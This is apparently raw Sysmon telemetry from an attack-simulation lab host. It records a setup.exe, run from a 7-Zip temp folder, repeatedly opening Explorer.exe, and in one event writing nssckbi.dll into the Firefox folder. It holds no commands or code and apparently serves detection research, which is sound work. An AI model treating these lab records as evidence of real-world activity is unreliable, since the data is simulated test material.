10341000x800000000000000015180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\nssckbi.dll2021-01-18 13:59:52.458 10341000x800000000000000015163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
